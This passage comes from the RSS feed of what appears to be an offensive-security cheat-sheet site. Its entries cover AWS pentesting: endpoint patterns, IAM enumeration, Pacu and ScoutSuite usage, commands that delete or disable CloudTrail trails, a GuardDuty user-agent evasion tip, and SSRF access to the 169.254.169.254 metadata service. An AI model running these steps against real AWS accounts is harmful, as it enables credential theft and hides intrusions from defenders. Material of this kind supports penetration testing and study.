 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;iot&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;mqtt://{random_id}.iot.{region}.amazonaws.com:8883&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;iot&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.iot.{region}.amazonaws.com:8443&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;iot&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.iot.{region}.amazonaws.com:443&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;mq&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;mq&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;kafka&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;kafka&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;cloud9&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.vfs.cloud9.{region}.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;mediastore&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.data.mediastore.{region}.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;kinesisvideo&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.kinesisvideo.{region}.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;mediaconvert&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.mediaconvert.{region}.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;mediapackage&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="access-key-id--secret" class="anchored-heading"&gt;Access Key ID &amp;amp; Secret&lt;a class="heading-anchor" href="#access-key-id--secret" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key.&lt;/p&gt;</description></item><item><title>AWS - CLI</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-cli/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-cli/</guid><description>&lt;p&gt;The AWS Command Line Interface (CLI) is a unified tool to manage AWS services from the command line. Using the AWS CLI, you can control multiple AWS services, automate tasks, and manage configurations through profiles.&lt;/p&gt;
&lt;h2 id="set-up-aws-cli" class="anchored-heading"&gt;Set up AWS CLI&lt;a class="heading-anchor" href="#set-up-aws-cli" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Install AWS CLI and configure it for the first time:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;configure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will prompt for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;AWS Access Key ID&lt;/li&gt;
&lt;li&gt;AWS Secret Access Key&lt;/li&gt;
&lt;li&gt;Default region name&lt;/li&gt;
&lt;li&gt;Default output format&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="creating-profiles" class="anchored-heading"&gt;Creating Profiles&lt;a class="heading-anchor" href="#creating-profiles" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;You can configure multiple profiles in &lt;code&gt;~/.aws/credentials&lt;/code&gt; and &lt;code&gt;~/.aws/config&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>AWS - Enumerate</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-enumeration/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-enumeration/</guid><description>&lt;h2 id="collectors" class="anchored-heading"&gt;Collectors&lt;a class="heading-anchor" href="#collectors" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/nccgroup/ScoutSuite/wiki"&gt;nccgroup/ScoutSuite&lt;/a&gt; - Multi-Cloud Security Auditing Tool&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;scout&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;PROVIDER&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-help&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# The --session-token is optional and only used for temporary credentials (i.e. role assumption).&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;scout&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-access-keys&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-access-key-id&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;AKIAIOSFODNN7EXAMPLE&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-secret-access-key&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;wJalrXUtnFEMI&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;K7MDENG&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bPxRfiCYEXAMPLEKEY&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-session-token&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;scout&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;azure&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-cli&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/RhinoSecurityLabs/pacu"&gt;RhinoSecurityLabs/pacu&lt;/a&gt; - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;bash&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;sh&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;pacu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;set_keys&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;swap_keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;module_name&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;[-&lt;/span&gt;&lt;span class="n"&gt;-keyword-arguments&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;module_name&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-regions&lt;/span&gt; &lt;span class="nb"&gt;eu-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;us-west&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/salesforce/cloudsplaining"&gt;salesforce/cloudsplaining&lt;/a&gt; - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report&lt;/p&gt;</description></item><item><title>AWS - Identity &amp; Access Management</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-iam/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-iam/</guid><description>&lt;h2 id="listing-iam-access-keys" class="anchored-heading"&gt;Listing IAM access Keys&lt;a class="heading-anchor" href="#listing-iam-access-keys" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;iam&lt;/span&gt; &lt;span class="nb"&gt;list-access&lt;/span&gt;&lt;span class="n"&gt;-keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="listing-iam-users-and-groups" class="anchored-heading"&gt;Listing IAM Users and Groups&lt;a class="heading-anchor" href="#listing-iam-users-and-groups" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;iam&lt;/span&gt; &lt;span class="nb"&gt;list-users&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;iam&lt;/span&gt; &lt;span class="nb"&gt;list-groups&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="get-iam-details" class="anchored-heading"&gt;Get IAM Details&lt;a class="heading-anchor" href="#get-iam-details" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;iam&lt;/span&gt; &lt;span class="nb"&gt;get-account&lt;/span&gt;&lt;span class="n"&gt;-authorization-details&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;iam&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="assume-a-specific-role" class="anchored-heading"&gt;Assume a Specific Role&lt;a class="heading-anchor" href="#assume-a-specific-role" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;sts&lt;/span&gt; &lt;span class="nb"&gt;assume-role&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-role-arn&lt;/span&gt; &lt;span class="n"&gt;arn&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;aws&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;iam&lt;/span&gt;&lt;span class="p"&gt;::${&lt;/span&gt;&lt;span class="n"&gt;accountId&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;role&lt;/span&gt;&lt;span class="p"&gt;/${&lt;/span&gt;&lt;span class="n"&gt;roleName&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-role-session-name&lt;/span&gt; &lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="n"&gt;roleName&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="login-with-mfa" class="anchored-heading"&gt;Login with MFA&lt;a class="heading-anchor" href="#login-with-mfa" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Retrieve the MFA device ARN:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;iam&lt;/span&gt; &lt;span class="nb"&gt;list-mfa&lt;/span&gt;&lt;span class="n"&gt;-devices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then create the session token:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;sts&lt;/span&gt; &lt;span class="nb"&gt;get-session&lt;/span&gt;&lt;span class="n"&gt;-token&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-serial-number&lt;/span&gt; &lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="n"&gt;arnMFADevice&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-token-code&lt;/span&gt; &lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="n"&gt;MFACode&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="shadow-admin" class="anchored-heading"&gt;Shadow Admin&lt;a class="heading-anchor" href="#shadow-admin" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="admin-equivalent-permission" class="anchored-heading"&gt;Admin equivalent permission&lt;a class="heading-anchor" href="#admin-equivalent-permission" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;AdministratorAccess&lt;/p&gt;</description></item><item><title>AWS - IOC &amp; Detections</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-ioc-detection/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-ioc-detection/</guid><description>&lt;h2 id="cloudtrail" class="anchored-heading"&gt;CloudTrail&lt;a class="heading-anchor" href="#cloudtrail" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="disable-cloudtrail" class="anchored-heading"&gt;Disable CloudTrail&lt;a class="heading-anchor" href="#disable-cloudtrail" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;cloudtrail&lt;/span&gt; &lt;span class="nb"&gt;delete-trail&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-name&lt;/span&gt; &lt;span class="n"&gt;cloudgoat_trail&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="n"&gt;administrator&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Disable monitoring of events from global services&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;cloudtrail&lt;/span&gt; &lt;span class="nb"&gt;update-trail&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-name&lt;/span&gt; &lt;span class="n"&gt;cloudgoat_trail&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-no-include-global-service-event&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Disable Cloud Trail on specific regions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;cloudtrail&lt;/span&gt; &lt;span class="nb"&gt;update-trail&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-name&lt;/span&gt; &lt;span class="n"&gt;cloudgoat_trail&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-no-include-global-service-event&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-no&lt;/span&gt;&lt;span class="o"&gt;-is&lt;/span&gt;&lt;span class="n"&gt;-multi-region&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-region&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;eu-west&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="guardduty" class="anchored-heading"&gt;GuardDuty&lt;a class="heading-anchor" href="#guardduty" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="os-user-agent" class="anchored-heading"&gt;OS User Agent&lt;a class="heading-anchor" href="#os-user-agent" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.&lt;/p&gt;
&lt;p&gt;Pacu bypass this problem by defining a custom User-Agent: &lt;a href="https://web.archive.org/web/20201111195614/https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1303"&gt;pacu.py#L1473&lt;/a&gt;&lt;/p&gt;</description></item><item><title>AWS - Metadata SSRF</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-metadata/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-metadata/</guid><description>&lt;blockquote&gt;
&lt;p&gt;AWS released additional security defences against the attack.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;:warning: Only working with IMDSv1.&lt;/p&gt;
&lt;p&gt;Enabling IMDSv2&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;aws&lt;/span&gt; &lt;span class="n"&gt;ec2&lt;/span&gt; &lt;span class="nb"&gt;modify-instance&lt;/span&gt;&lt;span class="n"&gt;-metadata-options&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-instance-id&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;INSTANCE-ID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-profile&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;AWS_PROFILE&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-http-endpoint&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-http-token&lt;/span&gt; &lt;span class="n"&gt;required&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In order to use &lt;strong&gt;IMDSv2&lt;/strong&gt; you must provide a token.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;export&lt;/span&gt; &lt;span class="n"&gt;TOKEN&lt;/span&gt;&lt;span class="p"&gt;=`&lt;/span&gt;&lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="n"&gt;-X&lt;/span&gt; &lt;span class="n"&gt;PUT&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;X-aws-ec2-metadata-token-ttl-seconds: 21600&amp;#34;&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;http://169.254.169.254/latest/api/token&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;X-aws-ec2-metadata-token:&lt;/span&gt;&lt;span class="nv"&gt;$TOKEN&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-v&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;http://169.254.169.254/latest/meta-data&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="method-for-elastic-cloud-compute-ec2" class="anchored-heading"&gt;Method for Elastic Cloud Compute (EC2)&lt;a class="heading-anchor" href="#method-for-elastic-cloud-compute-ec2" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.&lt;/p&gt;</description></item><item><title>AWS - Service - Cognito</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-cognito/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-cognito/</guid><description>&lt;p&gt;AWS Cognito is an AWS-managed service for authentication, authorization, and user management.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A user signs in through Cognito User Pools (authentication) or via a federated IdP (Google, Facebook, SAML, etc.).&lt;/li&gt;
&lt;li&gt;Cognito Identity Pools can then exchange this identity for temporary AWS credentials (from STS — Security Token Service).&lt;/li&gt;
&lt;li&gt;These credentials (Access Key ID, Secret Access Key, and Session Token) let the app directly call AWS services (e.g., S3, DynamoDB, API Gateway) with limited IAM roles/policies.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/padok-team/cognito-scanner"&gt;Cognito Scanner&lt;/a&gt; - A CLI tool for executing attacks on cognito such as &lt;em&gt;Unwanted account creation&lt;/em&gt;, &lt;em&gt;Account Oracle&lt;/em&gt; and &lt;em&gt;Identity Pool escalation&lt;/em&gt;.&lt;/p&gt;</description></item><item><title>AWS - Service - DynamoDB</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-dynamodb/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-dynamodb/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It&amp;rsquo;s a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="list-tables" class="anchored-heading"&gt;List Tables&lt;a class="heading-anchor" href="#list-tables" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="o"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;TableNames&amp;#34;&lt;/span&gt;: &lt;span class="o"&gt;[&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;users&amp;#34;&lt;/span&gt;
